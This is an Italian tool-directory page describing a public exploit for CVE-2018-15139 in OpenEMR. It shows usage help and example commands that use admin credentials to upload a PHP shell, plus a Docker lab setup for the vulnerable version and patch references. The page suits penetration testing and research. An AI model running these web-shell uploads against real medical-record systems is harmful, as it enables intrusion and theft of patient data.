Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
exploit-CVE-2018-15139 — OpenEMR < 5.0.1.4 - (Autenticato) Caricamento file - Esecuzione di comandi remoti | Kitploit
Strumenti/GitHubGitHub/sec-it/exploit-cve-2018-15139
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubsec-it/exploit-cve-2018-15139

exploit-CVE-2018-15139

OpenEMR < 5.0.1.4 - (Autenticato) Caricamento file - Esecuzione di comandi remoti

Vedi Repository
225 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit di OpenEMR CVE-2018-15139

OpenEMR < 5.0.1.4 - (Autenticato) Caricamento file - Esecuzione remota di comandi

Exploit per CVE-2018-15139.

Utilizzo

root@kitploit:~
$ ruby exploit.rb -h
OpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution

Source: https://github.com/sec-it/exploit-CVE-2019-14530

Usage:
  exploit.rb exploit <url> <filename> <username> <password> [--debug]
  exploit.rb -h | --help

Options:
  <url>       Root URL (base path) including HTTP scheme, port and root folder
  <filename>  Filename of the shell to be uploaded
  <username>  Username of the admin
  <password>  Password of the admin
  --debug     Display arguments
  -h, --help  Show this screen

Examples:
  exploit.rb exploit http://example.org/openemr shell.php admin pass
  exploit.rb exploit https://example.org:5000/ shell.php admin pass

Esempio

root@kitploit:~
$ ruby exploit.rb exploit http://172.24.0.3 agent.php admin pass
[+] File uploaded:
http://172.24.0.3/sites/default/images/agent.php

Requisiti

  • httpx
  • docopt.rb

Esempio usando gem:

root@kitploit:~
bundle install
# or
gem install httpx docopt

Distribuzione Docker del software vulnerabile

Attenzione: ovviamente questa configurazione non è adatta per l'uso in produzione!

root@kitploit:~
$ sudo docker-compose up

I permessi della cartella di upload sono danneggiati nell'immagine Docker ufficiale di OpenEMR, quindi è necessario connettersi al contenitore e correggere i permessi, ad esempio:

root@kitploit:~
$ sudo docker exec -ti exploit-cve-2018-15139_openemr_1 /bin/sh
$ chmod u+w /var/www/localhost/htdocs/openemr/sites/default/images/

Riferimenti

  • Software target: OpenEMR
    • Homepage: https://www.open-emr.org/
    • Source: https://github.com/openemr/openemr
    • Docker: vedi docker-compose.yml
    • Versione vulnerabile: < 5.0.1.4 (significa fino alla 5.0.1.3)
    • Patch: https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485

Questa è una riscrittura migliore di EDB-49998.

La vulnerabilità è stata trovata da Project Insecurity.

Analisi dell'exploit originale e della vulnerabilità:

  • OpenEMR corregge gravi vulnerabilità scoperte da Project Insecurity
Scarica lo strumento